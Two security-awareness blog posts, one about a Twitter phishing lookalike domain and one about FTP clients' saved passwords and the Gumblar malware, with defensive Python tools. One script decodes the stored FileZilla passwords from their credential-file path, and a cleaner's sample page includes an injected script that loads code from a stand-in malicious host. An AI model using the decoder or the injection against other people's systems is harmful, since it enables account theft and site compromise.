Phishing page – Twitter’s lookalike!

itwitterl.com - Phishing scam

 Phishing pages? Again? Really?!

And the skiddies have done it again. But now they have evolved! Let me put this blog post into a bit of context before I proceed.

What the heck is Phishing?

Well, phishing is a method that hackers, or to use the correct terminology, script-kiddies, use to hijack accounts. They build a landing/login page that looks very similar to a popular web service (Facebook, Twitter, Gmail, Hotmail, etc.) and then register a domain name that is also very close to the real service's name (Fac3b00k.com, itwitterl.com, h0tma1l.com...), with small substitutions or extra letters that you would not notice at a glance.

You are driven by your predisposed urge to enter your credentials whenever you see a login page, and BOOM! Your account is hijacked almost instantly. The password is changed (automatically, if the phishing page is good), and if the skiddy is not good or knows no programming language, he/she will change it manually at a later stage.

Uhh… What?!

Let’s take an example. Today I got the following direct message from a friend:

Phishing tweet - from a trusted friend

and almost instantaneously I clicked on the link. It was a shortened URL so I couldn’t see the actual domain I was visiting. I landed on this page:

Phishing twitter lookalike - This is the Fake one.

Now I'm confused, why is it asking me for credentials?! Since I have a little bit of hacking/deception background and I've played these games before, my quick reaction was... hehehe, nice try. I looked at the address bar and it said: http://itwitterl.com/session-timed_out/

Wow! Twitter have a new domain name!

I then entered false credentials and here’s where I landed:

itwitterl.com's fake service status page

Whether you enter correct credentials or false ones you will always land on this page, because this website is not the actual Twitter and it cannot actually log you into the service. Note that a more careful phishing kit would forward you to the real login page after capturing the credentials, so a dead-end "service status" page is a giveaway, but its absence is not proof that a page is legitimate.

Ohhhh… how can we tell the difference next time?

You can tell the difference easily, as long as you don't rush to enter your credentials whenever asked, and instead check the legitimacy of the website first.

Here’s the actual twitter page:

The real Twitter homepage - There's a lot of difference.

If you spend a second or two looking at both images you will see there are a lot of differences! The skids are not up-to-date! (A careful attacker can copy the current page pixel for pixel, though, so the look of the page is the weakest of the checks below.)

Tips for not falling into this trap again, and what to do if you are a victim

Below are 4 tips for making sure the website you are logging into is legit:

1. Check the address bar and read the domain name character by character: itwitterl.com is not twitter.com. Only the registrable domain counts; anything in front of it (twitter.com.something.com) is just a subdomain of the attacker's site.

2. Check the page title; many skids forget to fix the title of the page they copied.

3. If you are already logged into a service and you haven't closed your browser, it will not ask you to log in again unless you are changing critical account information, and in that case the service itself will tell you why it is asking.

4. Check the favicon; some skids forget to update theirs as well.
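The first tip is the one that matters most, and it can be automated. The following is an added example (not code from the original post) of a small Python check that extracts the registrable domain from a URL and flags the typo-squatting tricks mentioned above: digit-for-letter substitutions (Fac3b00k, h0tma1l), an extra letter wrapped around the brand (itwitterl), a brand name used as a subdomain of an unrelated domain, and a one-letter typo. The allowlist of known domains and the homoglyph table are assumptions, and the suffix handling is deliberately simplified.

```python
"""Lookalike-domain check for login URLs.

Added example, not code from the original post. KNOWN_DOMAINS, HOMOGLYPHS
and the sample URLs are constructed for illustration.
"""
from urllib.parse import urlsplit

# Assumption: the handful of login domains we expect to see.
KNOWN_DOMAINS = {"twitter.com", "facebook.com", "gmail.com", "hotmail.com"}

# Digit/symbol-for-letter substitutions typo-squatters use (0 for o, 1 for l, ...).
HOMOGLYPHS = {"0": "o", "1": "l", "3": "e", "4": "a", "5": "s",
              "7": "t", "@": "a", "$": "s", "|": "l"}


def hostname(url: str) -> str:
    """Lower-case host part of a URL; a bare 'example.com' is accepted too."""
    if "//" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").rstrip(".")


def registrable_domain(host: str) -> str:
    """Last two labels of the host (twitter.com from www.twitter.com).

    Simplification: wrong for multi-label suffixes such as co.uk; a real tool
    would consult the Public Suffix List.
    """
    return ".".join(host.split(".")[-2:])


def unhomoglyph(domain: str) -> str:
    """Map fac3b00k.com back to facebook.com so it can be compared."""
    name, _, tld = domain.rpartition(".")
    return "".join(HOMOGLYPHS.get(c, c) for c in name) + "." + tld


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, to catch dropped or doubled letters (twiter)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(url: str, max_distance: int = 1):
    """Return ("ok", domain), ("lookalike", domain, brand) or ("unknown", domain).

    Heuristic: brand names that are close to ordinary words (gmail vs email)
    can produce false positives at distance 1; tune the threshold to taste.
    """
    host = hostname(url)
    domain = registrable_domain(host)
    if domain in KNOWN_DOMAINS:
        return ("ok", domain)
    for brand in sorted(KNOWN_DOMAINS):
        # twitter.com.evil.example: the real name is only a subdomain label.
        if brand in host:
            return ("lookalike", domain, brand)
    candidate = unhomoglyph(domain)
    if candidate in KNOWN_DOMAINS:
        return ("lookalike", domain, candidate)
    cname = candidate.rpartition(".")[0]
    for brand in sorted(KNOWN_DOMAINS):
        bname = brand.rpartition(".")[0]
        # itwitterl contains the brand; twiter is one edit away from it.
        if bname in cname or edit_distance(cname, bname) <= max_distance:
            return ("lookalike", domain, brand)
    return ("unknown", domain)


if __name__ == "__main__":
    for u in ("https://twitter.com/login", "http://itwitterl.com/session-timed_out/",
              "Fac3b00k.com", "h0tma1l.com", "https://twitter.com.evil.example/",
              "https://example.com"):
        print(u, "->", classify(u))
```

The check is a heuristic, not a verdict: "unknown" means only that the domain is not one you have listed, and the two-label domain rule will misfire on country-code suffixes, so treat the result as a prompt to look again at the address bar rather than as proof either way.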

I’m a victim 🙁

If you entered your credentials into this fake service, go and change your password immediately, and change it anywhere else you reused the same password. If you are one of the unlucky few who have already had their password changed for them, I'm sorry to say that your account is lost unless you still control the e-mail address and/or remember your secret question and answer; in that case you can use the "forgot my password" feature available on most, if not all, popular services.

FTP Saved Passwords threat

FileZilla screenshot - http://filezilla-project.org

Introduction

This is a short post to warn about the dangers of saved passwords in popular FTP clients. Saved passwords are a threat whenever the client can decrypt them without asking the user for anything: whatever key or obfuscation the client uses has to be available to the running program, so it is equally available to malware running under the same user account. Open source only makes the scheme easier to read; it is not what makes it weak, and a closed-source client that stores its key alongside the data is no better.

The Gumblar botnet

What is known as Gumblar, or Troj/JSRedir-R, is a malicious threat delivered through PDF documents. Gumblar redirects visitors to a variety of websites hosting other malware. The infection is hard for the victim to notice, since the malicious PDF is opened by the Adobe Acrobat plugin inside the browser or by Adobe Acrobat itself; the payload then looks for the saved-password files written by FTP clients such as FileZilla or Dreamweaver, which are stored in plain text (in XML or other files).

It then connects to the FTP servers with those credentials and modifies every HTML, JavaScript, XML and CSS file it finds, appending a JavaScript redirection to a malicious website in order to infect further victims.

Gumblar also sniffs network traffic for FTP passwords; this works because plain FTP sends the username and password unencrypted. (Further Gumblar details are not covered in this post.)

FileZilla case

The location of the password files varies with the operating system. On Windows, for example, they are stored in the directory:

%APPDATA%\FileZilla

(sitemanager.xml holds the Site Manager entries and recentservers.xml the Quickconnect history, both including any saved password.)

A sample screenshot of one of the files containing unprotected passwords can be found below:

FileZilla sitemanager.xml file
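To see exactly what a Gumblar-style harvester gets from that file, here is an added example (not code from the original post or from the FileZilla project) that parses a sitemanager.xml and lists every stored credential. The XML is a constructed sample. Older FileZilla versions wrote the `<Pass>` element as plain text, as in the screenshot above; current versions write `<Pass encoding="base64">`, which is only an encoding, not encryption, so both forms are recovered the same way. The default path helper assumes the standard locations on Windows and on Linux/macOS.

```python
"""Audit FileZilla's sitemanager.xml for stored passwords.

Added example; not code from the original post or from the FileZilla project.
The XML below is a constructed sample. Older FileZilla versions wrote <Pass>
as plain text; current versions write <Pass encoding="base64">, which is only
an encoding, not encryption, so both are recovered the same way here.
"""
import base64
import os
import sys
import xml.etree.ElementTree as ET

# Constructed sample: two FTP sites with stored passwords (one old-style plain
# text, one base64) and one SFTP site that stores no password.
SAMPLE_SITEMANAGER = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.46.3" platform="windows">
  <Servers>
    <Server>
      <Host>ftp.example.com</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>webmaster</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
      <Name>Production site</Name>
    </Server>
    <Server>
      <Host>ftp.legacy.example.com</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>deploy</User>
      <Pass>letmein</Pass>
      <Name>Legacy site (old-format entry)</Name>
    </Server>
    <Server>
      <Host>sftp.example.com</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>deploy</User>
      <Name>Key-based SFTP</Name>
    </Server>
  </Servers>
</FileZilla3>
"""

# FileZilla's <Protocol> numbering: 0 is plain FTP, 1 is SFTP.
PROTOCOL_NAMES = {"0": "FTP", "1": "SFTP"}


def decode_pass(pass_el):
    """Return the stored password, or None if the entry stores no password."""
    if pass_el is None or not pass_el.text:
        return None
    if pass_el.get("encoding") == "base64":
        return base64.b64decode(pass_el.text).decode("utf-8")
    return pass_el.text  # old-format plain text


def audit_sitemanager(xml_text):
    """Parse sitemanager.xml and list every site with its stored credential."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    findings = []
    for server in root.iter("Server"):
        password = decode_pass(server.find("Pass"))
        protocol = PROTOCOL_NAMES.get(server.findtext("Protocol", ""), "other")
        if password is None:
            risk = "low"
        elif protocol == "FTP":
            risk = "high"  # exposed twice: on disk and in cleartext on the wire
        else:
            risk = "medium"
        findings.append({
            "name": server.findtext("Name", ""),
            "host": server.findtext("Host", ""),
            "user": server.findtext("User", ""),
            "protocol": protocol,
            "password": password,
            "risk": risk,
        })
    return findings


def stored_credentials(findings):
    """(host, user, password) for every entry a Gumblar-style harvester would take."""
    return [(f["host"], f["user"], f["password"]) for f in findings if f["password"] is not None]


def default_path():
    """Where FileZilla keeps sitemanager.xml (Windows vs. Linux/macOS)."""
    if sys.platform.startswith("win"):
        return os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "sitemanager.xml")
    return os.path.expanduser("~/.config/filezilla/sitemanager.xml")


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else default_path()
    if os.path.exists(path):
        with open(path, "rb") as fh:
            findings = audit_sitemanager(fh.read())
    else:
        print(f"{path} not found, using the constructed sample")
        findings = audit_sitemanager(SAMPLE_SITEMANAGER)
    for f in findings:
        shown = "(none)" if f["password"] is None else "*" * len(f["password"])
        print(f'{f["risk"]:6} {f["protocol"]:5} {f["user"]}@{f["host"]}  password: {shown}  [{f["name"]}]')
```

Run it against your own profile to see how many sites would be handed over in one go; anything it reports as "high" is a plain-FTP site whose password is exposed both in this file and on the network every time you connect.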

WinSCP is it a good replacement?

When looking for a solution to this problem there is no straightforward method, and switching to another FTP client is not the answer. WinSCP, for example, stores saved session passwords in the registry using a trivially reversible obfuscation, which is no better than plain text: anything that can read the registry keys as your user can recover them.

Conclusion

In case you were infected and Gumblar successfully connected to all your FTP servers and modified all your files (check the Gumblar botnet section above), you have to roll back all your HTML, JavaScript, XML and CSS files to a previous clean version. In case you don't have a previous version, well... a search and replace (via regular expressions) becomes your only option (I will not go into the details of how to do this; maybe in a future post). Either way, change the FTP passwords first, or the cleaned files will simply be re-infected.
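The post stops short of the search-and-replace itself. As an added illustration (not code from the original post), here is a Python pass that does what that clean-up needs: it flags every script tag that loads from a host outside your own allowlist, or that sits after the closing </html> where an appended injection lands, and strips them while reporting what was removed so the change can be reviewed before it is written back. The sample page, the allowlist and the malware.invalid host are constructed; the rule is generic and is not a signature for the real Gumblar code.

```python
"""Find and strip injected <script> tags from web files after an FTP compromise.

Added example; not code from the original post. The sample page, the allowlist
of script hosts and the 'malware.invalid' host are constructed; the patterns
(external script host not on your allowlist, or any script after </html>) are
generic and are not a signature of the real Gumblar payload.
"""
import re
from urllib.parse import urlsplit

# Assumption: the only hosts your own pages legitimately load scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "cdn.example.com"}

# Constructed sample: two legitimate scripts, one injected external script in
# the body, and one obfuscated script appended after the closing </html>.
SAMPLE_PAGE = """<!DOCTYPE html>
<html>
<head>
<title>Home</title>
<script src="/js/site.js"></script>
<script src="http://cdn.example.com/jquery.js"></script>
</head>
<body>
<p>Welcome</p>
<script src="http://malware.invalid/redir.js"></script>
</body>
</html>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A//malware.invalid/r.js%22%3E%3C/script%3E'))</script>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
HTML_END_RE = re.compile(r"</html>", re.IGNORECASE)


def script_host(tag):
    """Host of a script's src: None for inline scripts, '' for same-origin paths."""
    m = SRC_RE.search(tag)
    if not m:
        return None
    src = m.group(1)
    if "//" not in src:
        return ""
    return (urlsplit(src).hostname or "").lower()


def find_injected_scripts(html, allowed_hosts):
    """Return (start, end, reason) for every script tag that looks injected."""
    ends = [m.start() for m in HTML_END_RE.finditer(html)]
    html_end = ends[-1] if ends else len(html)  # no </html>: nothing is "after" it
    hits = []
    for m in SCRIPT_RE.finditer(html):
        host = script_host(m.group(0))
        if m.start() > html_end:
            hits.append((m.start(), m.end(), "script after </html>"))
        elif host and host not in allowed_hosts:
            hits.append((m.start(), m.end(), f"script from unlisted host {host}"))
    return hits


def clean_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Strip the flagged tags; returns (cleaned_html, reasons) for review."""
    hits = find_injected_scripts(html, allowed_hosts)
    out = html
    for start, end, _ in reversed(hits):  # cut from the back so offsets stay valid
        out = out[:start] + out[end:]
    return out, [reason for _, _, reason in hits]


if __name__ == "__main__":
    cleaned, reasons = clean_html(SAMPLE_PAGE)
    for r in reasons:
        print("removed:", r)
    print(cleaned)
```

Run it over every HTML, JavaScript, XML and CSS file the compromised account could write, review the reasons it prints, and only then write the cleaned output back; an inline script that is neither after </html> nor external is deliberately left alone, since the allowlist rule cannot tell it from your own code.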

There is no fail-safe method of protecting this type of data, but following the steps below helps reduce the severity of this threat:

1. Never store your FTP credentials in any FTP client; let it ask you for the password each time.

2. An alternative solution for storing FTP passwords can be found here (http://sww.co.nz/an-alternative-to-storing-passwords-in-filezilla-or-other-ftp-clients/). However, use this solution at your own risk; I have not tested it.

3. Prefer SFTP or FTPS over plain FTP, so that a sniffer on the network cannot read the credentials in transit. This does not help against malware running on the client itself.

This post is in no way a recommendation against using FileZilla or any other FTP client, it is written to warn about the dangers of using stored FTP credentials.